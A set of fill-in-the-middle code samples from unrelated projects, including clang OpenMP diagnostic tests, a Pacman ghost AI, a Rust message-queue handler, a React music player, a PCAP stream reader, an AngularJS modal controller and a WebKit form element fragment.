#pragma omp master taskloop simd lastprivate(a, b, c, d, f) // expected-error {{lastprivate variable with incomplete type 'S1'}} expected-error 1 {{const-qualified variable without mutable fields cannot be lastprivate}} expected-error 2 {{const-qualified variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argv[1]) // expected-error {{expected variable name}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(2 * 2) // expected-error {{expected variable name}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(ba)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(ca) // expected-error {{const-qualified variable without mutable fields cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(da) // expected-error {{const-qualified variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
int xa;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(xa) // OK
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S2::S2s) // expected-error {{shared variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S2::S2sc) // expected-error {{const-qualified variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd safelen(5)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(e, g) // expected-error {{calling a private constructor of class 'S4'}} expected-error {{calling a private constructor of class 'S5'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(m) // expected-error {{'operator=' is a private member of 'S3'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(h) // expected-error {{threadprivate or thread local variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(B::x) // expected-error {{threadprivate or thread local variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd private(xa), lastprivate(xa) // expected-error {{private variable cannot be lastprivate}} expected-note {{defined as private}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(i) // omp45-note {{defined as lastprivate}}
for (i = 0; i < argc; ++i) // omp45-error {{loop iteration variable in the associated loop of 'omp master taskloop simd' directive may not be lastprivate, predetermined as linear}}
foo();
#pragma omp parallel private(xa)
#pragma omp master taskloop simd lastprivate(xa)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel reduction(+ : xa)
#pragma omp master taskloop simd lastprivate(xa)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(j)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd firstprivate(m) lastprivate(m) // expected-error {{'operator=' is a private member of 'S3'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(n) firstprivate(n) // OK
for (i = 0; i < argc; ++i)
foo();
static int si;
#pragma omp master taskloop simd lastprivate(si) // OK
for (i = 0; i < argc; ++i)
si = i + 1;
return foomain<S4, S5>(argc, argv); // expected-note {{in instantiation of function template specialization 'foomain<S4, S5>' requested here}}
}<|fim▁end|>
|
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc, // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
|
<|file_name|>Ghosts.py<|end_file_name|><|fim▁begin|>from MakeGraph import MakeGraph
from Moving_pacman import PacMan
import pygame
class Ghost(MakeGraph):
index = 0
def __init__(self,class_graph,x,y):
Ghost.index = Ghost.index + 1
self.all_nodes = class_graph.get_nodes()
self.paths_to_all_nodes = class_graph.get_shortest_path()
self.path = []
self.hunting = False
self.name_image_u = "Ghost_red_up"
self.name_image_d = "Ghost_red_down"
self.name_image_l = "Ghost_red_left"
self.name_image_r = "Ghost_red_right"
self.name_image = self.name_image_u
self.cords={'x': x, 'y': y}
# {'x': 92, 'y': 161}
self.index = Ghost.index
def next_hop(self):
if self.path:
return self.path[0]
return []
def find_ghost_cords(self):
ghost_x = int(self.cords['y']/23)
ghost_y = int(self.cords['x']/23)
return (ghost_x,ghost_y)
def get_pictures(self):
if self.index == 0 :
self.name_image_u = "Ghost_red_up"
self.name_image_d = "Ghost_red_down"
self.name_image_l = "Ghost_red_left"
self.name_image_r = "Ghost_red_right"
if self.index == 1:
self.name_image_u = "Ghost_orange_up"
self.name_image_d = "Ghost_orange_down"
self.name_image_l = "Ghost_orange_left"
self.name_image_r = "Ghost_orange_right"
if self.index == 2:
self.name_image_u = "Ghost_pink_up"
self.name_image_d = "Ghost_pink_down"
self.name_image_l = "Ghost_pink_left"
self.name_image_r = "Ghost_pink_right"
if self.index == 3:
self.name_image_u = "Ghost_cyan_up"
self.name_image_d = "Ghost_cyan_down"
self.name_image_l = "Ghost_cyan_left"
self.name_image_r = "Ghost_cyan_right"
def find_closest_nodes(self):
closest_nodes =[]
ghost_x = int(self.cords['x']/23)
ghost_y = int(self.cords['y']/23)
vertex = (ghost_y,ghost_x)
queue = [vertex]
Visited = [vertex]
# if vertex in all_Nodes:
# all_Nodes.remove(vertex)
while queue != []:
new_v = queue.pop(0)
new_v_adj = [(new_v[0] - 1, new_v[1]),
(new_v[0] + 1, new_v[1]),
(new_v[0], new_v[1] - 1),
(new_v[0], new_v[1] + 1)]
for v_adj in new_v_adj:
if self.is_p_vertex(v_adj) and v_adj not in Visited:
if v_adj in self.all_nodes:
closest_nodes.append((v_adj[1],v_adj[0]))
else:
queue.append(v_adj)
Visited.append(v_adj)
return closest_nodes
def find_closest_vertex(self):
closest_nodes =[]
ghost_x = int(self.cords['x']/23)
ghost_y = int(self.cords['y']/23)
vertex = (ghost_y,ghost_x)
queue = [vertex]
map_to_a_vertex = {}
visited_n = [vertex]
# print (self.all_nodes)
if vertex in self.all_nodes:
return []
while queue != []:
new_v = queue.pop(0)
new_v_adj = [(new_v[0] - 1, new_v[1]),
(new_v[0] + 1, new_v[1]),
(new_v[0], new_v[1] - 1),
(new_v[0], new_v[1] + 1)]
for v_adj in new_v_adj:
map_to_a_vertex[v_adj] = new_v
if v_adj in self.all_nodes:
full_path = [v_adj]<|fim▁hole|> while map_to_a_vertex[v_adj] != vertex:
v_adj = map_to_a_vertex[v_adj]
full_path.insert(0,v_adj)
return full_path
if MakeGraph.is_p_vertex(self,v_adj) and v_adj not in visited_n:
queue.append(v_adj)
visited_n.append(v_adj)
def ghost_move(self, pacman_vertex, pacman_cords):
my_cords = (int(self.cords['y']/23),int(self.cords['x']/23))
if my_cords == pacman_vertex:
self.hunting = True
if self.hunting == True:
self.path = self.search_eat(pacman_cords)
if not self.path:
if self.hunting == True:
self.hunting = False
if self.find_closest_vertex() != []:
self.path = self.find_closest_vertex()
else:
for i in self.paths_to_all_nodes[my_cords][pacman_vertex]:
self.path.extend(2*[i])
def ghost_make_move(self):
# if not self.path:
# self.ghost_move(screen,pacman_vertex,pacman_cords)
new_step = self.path.pop(0)
old_step = (int(self.cords['y'] / 23),int(self.cords['x'])/23)
if old_step[0] == new_step[0] and old_step[1]<new_step[1]:
self.name_image = self.name_image_r
if old_step[0] == new_step[0] and old_step[1]>new_step[1]:
self.name_image = self.name_image_l
if old_step[0] < new_step[0] and old_step[1]==new_step[1]:
self.name_image = self.name_image_d
if old_step[0] > new_step[0] and old_step[1]==new_step[1]:
self.name_image = self.name_image_u
self.cords['y'] = new_step[0]*23
self.cords['x'] = new_step[1]*23
def search_eat(self,pacman_cords):
closest_nodes =[]
# pacman_x = int(pacman_cords['x']/23)
# pacman_y = int(pacman_cords['y']/23)
ghost_x = int(self.cords['x']/23)
ghost_y = int(self.cords['y']/23)
vertex = (ghost_y,ghost_x)
queue = [vertex]
map_to_a_vertex = {}
visited_n = [vertex]
if vertex == pacman_cords:
return []
while queue != []:
new_v = queue.pop(0)
new_v_adj = [(new_v[0] - 1, new_v[1]),
(new_v[0] + 1, new_v[1]),
(new_v[0], new_v[1] - 1),
(new_v[0], new_v[1] + 1)]
for v_adj in new_v_adj:
if self.is_p_vertex(v_adj) and v_adj not in visited_n:
queue.append(v_adj)
visited_n.append(v_adj)
map_to_a_vertex[v_adj] = new_v
if v_adj == pacman_cords:
# map_to_a_vertex[v_adj] = new_v
# print(map_to_a_vertex)
# print("abc",v_adj,new_v)
while map_to_a_vertex[v_adj] != vertex:
# print("abc",v_adj)
v_adj = map_to_a_vertex[v_adj]
return [v_adj]
return []
def draw_ghost(self,screen):
ghost = pygame.image.load("Ghosts/Ghost_cyan_down.png")
# print(self.find_closest_vertex())
self.ghost_move(screen,(14,13),(16,14))
# p = self.path[-1]
# pygame.draw.rect(screen, (124, 124, 0),
# (p[1]* 23, p[0] * 23, 23, 23))
screen.blit(ghost,(self.cords['x'], self.cords['y']))<|fim▁end|>
| |
<|file_name|>mq_handler.rs<|end_file_name|><|fim▁begin|>// Copyright Cryptape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use crate::helper::{RpcMap, TransferType};
use jsonrpc_proto::response::OutputExt;
use jsonrpc_types::rpc_response::Output;
use libproto::router::{MsgType, RoutingKey, SubModules};
use libproto::Message;
use libproto::TryFrom;
use serde_json;
#[derive(Default)]
pub struct MqHandler {
responses: RpcMap,
}
impl MqHandler {
pub fn new(responses: RpcMap) -> Self {
MqHandler { responses }
}
pub fn handle(&mut self, key: &str, body: &[u8]) -> Result<(), ()> {
trace!("get msg from routing_key {}", key);
let mut msg = Message::try_from(body).map_err(|e| {
error!("try_from: {:?}", e);
})?;
match RoutingKey::from(key) {
routing_key!(Auth >> Response)
| routing_key!(Chain >> Response)
| routing_key!(Executor >> Response)
| routing_key!(Jsonrpc >> Response)
| routing_key!(Net >> Response) => {
let content = msg.take_response().ok_or_else(|| {
error!("empty response message");
})?;<|fim▁hole|> let resp = {
let request_id = &content.request_id;
trace!("from response request_id {:?}", request_id);
self.responses.lock().remove(request_id).ok_or_else(|| {
warn!("receive lost request_id {:?}", request_id);
})?
};
match resp {
TransferType::HTTP((req_info, sender)) => {
sender
.send(Output::from_res_info(content, req_info))
.map_err(|e| {
error!("http: {:?}", e);
})?;
}
TransferType::WEBSOCKET((req_info, sender)) => {
let json_body =
serde_json::to_string(&Output::from_res_info(content, req_info))
.map_err(|e| {
error!("ws: {:?}", e);
})?;
sender.send(json_body).map_err(|e| {
error!("ws: {:?}", e);
})?;
}
};
}
_ => {
warn!("receive unexpect key {}", key);
}
};
Ok(())
}
}<|fim▁end|>
| |
<|file_name|>Player.js<|end_file_name|><|fim▁begin|>import React, {Component} from 'react';
import {bindActionCreators} from 'redux';
import {connect} from 'react-redux';
import {initialPlay, nextTrack, togglePlaying} from 'redux/modules/player';
import {starTrack, unstarTrack} from 'redux/modules/starred';
import {isTrackStarred} from 'utils/track';
const classNames = require('classnames');
const styles = require('./Player.scss');
@connect(
state => ({player: state.player, starred: state.starred}),
dispatch => bindActionCreators({initialPlay, nextTrack, starTrack, unstarTrack, togglePlaying}, dispatch))
export default class Player extends Component {
constructor(props) {
super(props);
this.handleToggleClick = this.handleToggleClick.bind(this);
this.handleNextTrack = this.handleNextTrack.bind(this);
this.handleStarTrack = this.handleStarTrack.bind(this);
this.handleStarTrackClick = this.handleStarTrackClick.bind(this);
this.isStarred = this.isStarred.bind(this);
this.isTrackSelected = this.isTrackSelected.bind(this);
this.renderInfo = this.renderInfo.bind(this);
}
handleToggleClick() {
const {initialPlay, player, togglePlaying} = this.props; // eslint-disable-line no-shadow
const {currentTrack} = player;
if (currentTrack) {
togglePlaying();
} else {
initialPlay();
}
}
handleNextTrack() {
if (!this.isTrackSelected()) return;
const {nextTrack} = this.props; // eslint-disable-line no-shadow
nextTrack();
}
handleStarTrack() {
const {player, starTrack} = this.props; // eslint-disable-line no-shadow
const {currentTrack} = player;
starTrack(currentTrack);
console.log('starrr');
}
handleStarTrackClick() {
if (this.isStarred()) {
this.handleUnstarTrack();
} else {
this.handleStarTrack();
}
}
handleUnstarTrack() {
const {player, unstarTrack} = this.props; // eslint-disable-line no-shadow
const {currentTrack} = player;
unstarTrack(currentTrack);
console.log('unstarrr');
}
isStarred() {
const {player, starred} = this.props;
const {currentTrack} = player;
if (!this.isTrackSelected()) return false;
const {starredTracks} = starred;
return isTrackStarred(currentTrack, starredTracks);
}
isTrackSelected() {
const {player} = this.props;
const {currentTrack} = player;
return currentTrack ? true : false;
}
renderInfo() {
const {player} = this.props;
const {currentTrack} = player;
if (!currentTrack) return '';
const {
data: {
title,
artist: {
name: artistName,
url: artistUrl
},
track: {
url: trackUrl
}
}
} = currentTrack;
return (
<h3 className={styles['info__text']}>
<a className={styles['info__text__title']} href={trackUrl} target="_blank">{title}</a>
<span className={styles['info__text__divider']}></span>
<a className={styles['info__text__artist']} href={artistUrl} target="_blank">{artistName}</a>
</h3>
);
}
render() {
const {player} = this.props;
const {
playing: isPlaying
} = player;
const isStarred = this.isStarred();
console.log('is starred?', isStarred);
const trackIsSelected = this.isTrackSelected();
const rootClasses = classNames(
styles['Player'],
{
[styles['state--empty']]: !trackIsSelected,
[styles['state--playing']]: isPlaying,
[styles['state--starred']]: isStarred,
[styles['state--disabled']]: !trackIsSelected
}
);
return (
<div className={rootClasses}>
<div className={styles['info']}>
{this.renderInfo()}
</div>
<div className={styles['controls']}>
<div className={[styles['btn'], styles['btn--star']].join(' ')} onClick={this.handleStarTrackClick}>
<div className={styles['btnIcon']}></div>
</div>
<div className={[styles['btn'], styles['btn--share']].join(' ')}>
<div className={styles['btnIcon']}></div>
</div>
<div className={[styles['btn'], styles['btn--toggle']].join(' ')} onClick={this.handleToggleClick}>
<div className={styles['btnIcon']}></div>
</div><|fim▁hole|> </div>
</div>
</div>
);
}
}
Player.propTypes = {
initialPlay: React.PropTypes.func,
nextTrack: React.PropTypes.func,
player: React.PropTypes.object,
starred: React.PropTypes.object,
starTrack: React.PropTypes.func,
unstarTrack: React.PropTypes.func,
togglePlaying: React.PropTypes.func,
};<|fim▁end|>
|
<div className={[styles['btn'], styles['btn--skip']].join(' ')} onClick={this.handleNextTrack}>
<div className={styles['btnIcon']}></div>
|
<|file_name|>floor.rs<|end_file_name|><|fim▁begin|>use malachite_base::num::arithmetic::traits::{DivRound, DivRoundAssign, Floor, FloorAssign};
use malachite_base::num::basic::traits::One;
use malachite_base::rounding_modes::RoundingMode;
use malachite_nz::integer::Integer;
use malachite_nz::natural::Natural;
use std::mem::swap;
use Rational;
impl Floor for Rational {
type Output = Integer;
/// Finds the floor of a `Rational`, taking the `Rational` by value.
///<|fim▁hole|> /// $$
/// f(x) = \lfloor x \rfloor.
/// $$
///
/// # Worst-case complexity
/// TODO
///
/// # Examples
/// ```
/// extern crate malachite_base;
/// extern crate malachite_q;
///
/// use malachite_base::num::arithmetic::traits::Floor;
/// use malachite_base::num::basic::traits::Zero;
/// use malachite_q::Rational;
///
/// assert_eq!(Rational::ZERO.floor(), 0);
/// assert_eq!(Rational::from_signeds(22, 7).floor(), 3);
/// assert_eq!(Rational::from_signeds(-22, 7).floor(), -4);
/// ```
fn floor(self) -> Integer {
if self.sign {
Integer::from(self.numerator / self.denominator)
} else {
Integer::from_sign_and_abs(
false,
self.numerator
.div_round(self.denominator, RoundingMode::Ceiling),
)
}
}
}
impl<'a> Floor for &'a Rational {
type Output = Integer;
/// Finds the floor of a `Rational`, taking the `Rational` by reference.
///
/// $$
/// f(x) = \lfloor x \rfloor.
/// $$
///
/// # Worst-case complexity
/// TODO
///
/// # Examples
/// ```
/// extern crate malachite_base;
/// extern crate malachite_q;
///
/// use malachite_base::num::arithmetic::traits::Floor;
/// use malachite_base::num::basic::traits::Zero;
/// use malachite_q::Rational;
/// use std::str::FromStr;
///
/// assert_eq!((&Rational::ZERO).floor(), 0);
/// assert_eq!((&Rational::from_signeds(22, 7)).floor(), 3);
/// assert_eq!((&Rational::from_signeds(-22, 7)).floor(), -4);
/// ```
fn floor(self) -> Integer {
if self.sign {
Integer::from(&self.numerator / &self.denominator)
} else {
Integer::from_sign_and_abs(
false,
(&self.numerator).div_round(&self.denominator, RoundingMode::Ceiling),
)
}
}
}
impl FloorAssign for Rational {
/// Replaces a `Rational` with its floor.
///
/// $$
/// x \gets \lfloor x \rfloor.
/// $$
///
/// # Worst-case complexity
/// TODO
///
/// # Examples
/// ```
/// extern crate malachite_base;
/// extern crate malachite_q;
///
/// use malachite_base::num::arithmetic::traits::FloorAssign;
/// use malachite_base::num::basic::traits::Zero;
/// use malachite_q::Rational;
/// use std::str::FromStr;
///
/// let mut x = Rational::ZERO;
/// x.floor_assign();
/// assert_eq!(x, 0);
///
/// let mut x = Rational::from_signeds(22, 7);
/// x.floor_assign();
/// assert_eq!(x, 3);
///
/// let mut x = Rational::from_signeds(-22, 7);
/// x.floor_assign();
/// assert_eq!(x, -4);
/// ```
fn floor_assign(&mut self) {
let mut d = Natural::ONE;
swap(&mut self.denominator, &mut d);
if self.sign {
self.numerator /= d;
} else {
self.numerator.div_round_assign(d, RoundingMode::Ceiling);
if !self.sign && self.numerator == 0 {
self.sign = true;
}
}
}
}<|fim▁end|>
| |
<|file_name|>Tile.ts<|end_file_name|><|fim▁begin|>import Point from "esri/geometry/Point";
import Graphic from "esri/Graphic";
import { quantizePoint } from "../common/quantizationUtils";
import TileBase from "../common/TileBase";<|fim▁hole|>
// --------------------------------------------------------------------------
//
// Lifecycle
//
// --------------------------------------------------------------------------
constructor(readonly tileInfo: TileInfo, readonly isDebug = false) {
super(tileInfo);
}
// --------------------------------------------------------------------------
//
// Public methods
//
// --------------------------------------------------------------------------
setData(features: Graphic[]): void {
// we have to quantize the graphics for the tile
if (this.isDebug) {
this.tileData = {
vertexData: new Float32Array([10, 10, 10, 502, 502, 10, 502, 502]),
indexData: new Uint32Array([0, 1, 2, 1, 3, 2]),
elementCount: 6
};
return;
}
if (!features || features.length === 0) {
this.tileData = { vertexData: null, indexData: null, elementCount: 0 };
return;
}
const tileInfo = this.tileInfo;
const quantizedPoints = this._quantizeGraphics(features, {
originPosition: "upper-left",
scale: [tileInfo.resolution, tileInfo.resolution],
translate: [tileInfo.bounds[0], tileInfo.bounds[3]]
});
this.tileData = this._createMesh(features, quantizedPoints);
}
// --------------------------------------------------------------------------
//
// Private methods
//
// --------------------------------------------------------------------------
private _quantizeGraphics(
graphics: Graphic[],
transform: QuantizationTransform
): IPoint[] {
const quantizedPoints: IPoint[] = new Array<IPoint>(graphics.length);
for (let index = 0; index < graphics.length; index++) {
const graphic = graphics[index];
const geometry = graphic.geometry;
if (geometry) {
quantizedPoints[index] = quantizePoint(transform, geometry as Point);
}
}
return quantizedPoints;
}
private _createMesh(features: Graphic[], quantizedPoints: IPoint[]): TileData {
if (!features) {
return null;
}
// create TypedArrays from the features (for now use position and offset only)
// we use four floats per vertex, and we have 4 vertices per marker
const stride = 4 * 4;
const indicesPerQuad = 6;
const vertexData = new Float32Array(features.length * stride);
const indexData = new Uint32Array(indicesPerQuad * features.length)
let arrayIndex = 0;
for (let index = 0; index < features.length; index++) {
const point = quantizedPoints[index];
arrayIndex = stride * index;
// encode the per vertex data
// upper-left
vertexData[arrayIndex + 0] = point.x;
vertexData[arrayIndex + 1] = point.y;
vertexData[arrayIndex + 2] = -0.5;
vertexData[arrayIndex + 3] = -0.5;
// upper-right
vertexData[arrayIndex + 4] = point.x;
vertexData[arrayIndex + 5] = point.y;
vertexData[arrayIndex + 6] = 0.5;
vertexData[arrayIndex + 7] = -0.5;
// lower-left
vertexData[arrayIndex + 8] = point.x;
vertexData[arrayIndex + 9] = point.y;
vertexData[arrayIndex + 10] = -0.5;
vertexData[arrayIndex + 11] = 0.5;
// lower right
vertexData[arrayIndex + 12] = point.x;
vertexData[arrayIndex + 13] = point.y;
vertexData[arrayIndex + 14] = 0.5;
vertexData[arrayIndex + 15] = 0.5;
// encode the index buffer
indexData[indicesPerQuad * index + 0] = 4 * index + 0;
indexData[indicesPerQuad * index + 1] = 4 * index + 1;
indexData[indicesPerQuad * index + 2] = 4 * index + 2;
indexData[indicesPerQuad * index + 3] = 4 * index + 1;
indexData[indicesPerQuad * index + 4] = 4 * index + 3;
indexData[indicesPerQuad * index + 5] = 4 * index + 2;
}
const elementCount = indicesPerQuad * features.length;
return {
vertexData,
indexData,
elementCount
};
}
}<|fim▁end|>
|
import { IPoint, QuantizationTransform, TileData, TileInfo } from '../interfaces';
export default class Tile extends TileBase {
|
<|file_name|>s_pcap.py<|end_file_name|><|fim▁begin|>import dpkt
import socket
import logging
l = logging.getLogger("simuvex.s_pcap")
class PCAP(object):
def __init__(self,path, ip_port_tup, init=True):
self.path = path
self.packet_num = 0
self.pos = 0
self.in_streams = []
self.out_streams = []
#self.in_buf = ''
self.ip = ip_port_tup[0]<|fim▁hole|> if init:
self.initialize(self.path)
def initialize(self,path):
#import ipdb;ipdb.set_trace()
f = open(path)
pcap = dpkt.pcap.Reader(f)
for _,buf in pcap:
#data = dpkt.ethernet.Ethernet(buf).ip.data.data
ip = dpkt.ethernet.Ethernet(buf).ip
tcp = ip.data
myip = socket.inet_ntoa(ip.dst)
if myip is self.ip and tcp.dport is self.port and len(tcp.data) is not 0:
self.out_streams.append((len(tcp.data),tcp.data))
elif len(tcp.data) is not 0:
self.in_streams.append((len(tcp.data),tcp.data))
f.close()
def recv(self, length):
#import ipdb;ipdb.set_trace()
temp = 0
#import ipdb;ipdb.set_trace()
#pcap = self.pcap
initial_packet = self.packet_num
plength, pdata = self.in_streams[self.packet_num]
length = min(length, plength)
if self.pos is 0:
if plength > length:
temp = length
else:
self.packet_num += 1
packet_data = pdata[self.pos:length]
self.pos += temp
else:
if (self.pos + length) >= plength:
rest = plength-self.pos
length = rest
self.packet_num += 1
packet_data = pdata[self.pos:plength]
if self.packet_num is not initial_packet:
self.pos = 0
return packet_data, length
def copy(self):
new_pcap = PCAP(self.path, (self.ip, self.port), init=False)
new_pcap.packet_num = self.packet_num
new_pcap.pos = self.pos
new_pcap.in_streams = self.in_streams
new_pcap.out_streams = self.out_streams
return new_pcap<|fim▁end|>
|
self.port = ip_port_tup[1]
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>#
# Copyright (C) 2003-2022 Sébastien Helleu <[email protected]>
#
# This file is part of WeeChat.org.
#
# WeeChat.org is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# WeeChat.org is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.<|fim▁hole|>
"""Some useful views."""
from django.views.generic import TemplateView
class TextTemplateView(TemplateView):
"""View for a plain text file."""
def render_to_response(self, context, **response_kwargs):
response_kwargs['content_type'] = 'text/plain'
return super().render_to_response(context, **response_kwargs)<|fim▁end|>
|
#
# You should have received a copy of the GNU General Public License
# along with WeeChat.org. If not, see <https://www.gnu.org/licenses/>.
#
|
<|file_name|>new-chapter-title-modal.controller.ts<|end_file_name|><|fim▁begin|>// Copyright 2020 The Oppia Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS-IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview Controller for new chapter title modal.
*/
require(
'components/common-layout-directives/common-elements/' +
'confirm-or-cancel-modal.controller.ts');
require('domain/story/story-update.service.ts');
require('pages/story-editor-page/services/story-editor-state.service.ts');
require('domain/exploration/exploration-id-validation.service.ts');
import newChapterConstants from 'assets/constants';
angular.module('oppia').controller('CreateNewChapterModalController', [
'$controller', '$scope', '$uibModalInstance',
'ExplorationIdValidationService', 'StoryEditorStateService',
'StoryUpdateService', 'ValidatorsService', 'nodeTitles',
'MAX_CHARS_IN_EXPLORATION_TITLE',
function(
$controller, $scope, $uibModalInstance,
ExplorationIdValidationService, StoryEditorStateService,
StoryUpdateService, ValidatorsService, nodeTitles,
MAX_CHARS_IN_EXPLORATION_TITLE) {
$controller('ConfirmOrCancelModalController', {
$scope: $scope,
$uibModalInstance: $uibModalInstance
});
$scope.init = function() {
$scope.title = '';
$scope.explorationId = '';
$scope.invalidExpId = '';
$scope.nodeTitles = nodeTitles;
$scope.errorMsg = null;
$scope.invalidExpErrorString = 'Please enter a valid exploration id.';
$scope.MAX_CHARS_IN_EXPLORATION_TITLE = MAX_CHARS_IN_EXPLORATION_TITLE;
$scope.story = StoryEditorStateService.getStory();
$scope.nodeId = $scope.story.getStoryContents().getNextNodeId();
$scope.editableThumbnailFilename = '';
$scope.editableThumbnailBgColor = '';
$scope.allowedBgColors = (
newChapterConstants.ALLOWED_THUMBNAIL_BG_COLORS.chapter);
StoryUpdateService.addStoryNode($scope.story, $scope.title);
};
$scope.init();
$scope.updateThumbnailFilename = function(
newThumbnailFilename) {
StoryUpdateService.setStoryNodeThumbnailFilename(
$scope.story, $scope.nodeId, newThumbnailFilename);
$scope.editableThumbnailFilename = newThumbnailFilename;
$scope.$applyAsync();
};
$scope.updateThumbnailBgColor = function(newThumbnailBgColor) {
StoryUpdateService.setStoryNodeThumbnailBgColor(
$scope.story, $scope.nodeId, newThumbnailBgColor);
$scope.editableThumbnailBgColor = newThumbnailBgColor;
};
$scope.updateTitle = function() {
StoryUpdateService.setStoryNodeTitle(
$scope.story, $scope.nodeId, $scope.title);
};
$scope.cancel = function() {
StoryUpdateService.deleteStoryNode($scope.story, $scope.nodeId);
$uibModalInstance.dismiss();
};
$scope.updateExplorationId = function() {
var nodes = $scope.story.getStoryContents().getNodes();
for (var i = 0; i < nodes.length; i++) {
if (nodes[i].getExplorationId() === $scope.explorationId) {
$scope.invalidExpErrorString = (
'The given exploration already exists in the story.');
$scope.invalidExpId = true;
return;
}
}
if (StoryEditorStateService.isStoryPublished()) {
ExplorationIdValidationService.isExpPublishedAsync(
$scope.explorationId).then(function(expIdIsValid) {
$scope.expIdIsValid = expIdIsValid;
if ($scope.expIdIsValid) {
StoryUpdateService.setStoryNodeExplorationId(
$scope.story, $scope.nodeId, $scope.explorationId);
$uibModalInstance.close();
} else {
$scope.invalidExpId = true;
}
});
} else {
StoryUpdateService.setStoryNodeExplorationId(
$scope.story, $scope.nodeId, $scope.explorationId);
$uibModalInstance.close();
}
};
$scope.resetErrorMsg = function() {
$scope.errorMsg = null;
$scope.invalidExpId = false;
$scope.invalidExpErrorString = 'Please enter a valid exploration id.';
};
$scope.validateExplorationId = function() {
return ValidatorsService.isValidExplorationId(
$scope.explorationId, false);
};
$scope.isValid = function() {
return Boolean(
$scope.title &&
ValidatorsService.isValidExplorationId($scope.explorationId, false) &&
$scope.editableThumbnailFilename);
};
$scope.save = function() {
if ($scope.nodeTitles.indexOf($scope.title) !== -1) {
$scope.errorMsg = 'A chapter with this title already exists';
return;
}<|fim▁hole|> $scope.updateTitle();
$scope.updateExplorationId();
};
}
]);<|fim▁end|>
| |
<|file_name|>FormAssociatedElement.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 1999 Lars Knoll ([email protected])
* (C) 1999 Antti Koivisto ([email protected])
* (C) 2001 Dirk Mueller ([email protected])
* Copyright (C) 2004, 2005, 2006, 2007 Apple Inc. All rights reserved.
* (C) 2006 Alexey Proskuryakov ([email protected])
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public License
* along with this library; see the file COPYING.LIB. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA.
*
*/<|fim▁hole|>#include "EditorClient.h"
#include "FormController.h"
#include "Frame.h"
#include "HTMLFormControlElement.h"
#include "HTMLFormElement.h"
#include "HTMLNames.h"
#include "HTMLObjectElement.h"
#include "IdTargetObserver.h"
#include "ValidityState.h"
namespace WebCore {
using namespace HTMLNames;
class FormAttributeTargetObserver : IdTargetObserver {
WTF_MAKE_FAST_ALLOCATED;
public:
static PassOwnPtr<FormAttributeTargetObserver> create(const AtomicString& id, FormAssociatedElement*);
virtual void idTargetChanged() OVERRIDE;
private:
FormAttributeTargetObserver(const AtomicString& id, FormAssociatedElement*);
FormAssociatedElement* m_element;
};
FormAssociatedElement::FormAssociatedElement()
: m_form(0)
{
}
FormAssociatedElement::~FormAssociatedElement()
{
setForm(0);
}
ValidityState* FormAssociatedElement::validity()
{
if (!m_validityState)
m_validityState = ValidityState::create(this);
return m_validityState.get();
}
void FormAssociatedElement::didMoveToNewDocument(Document* oldDocument)
{
HTMLElement* element = toHTMLElement(this);
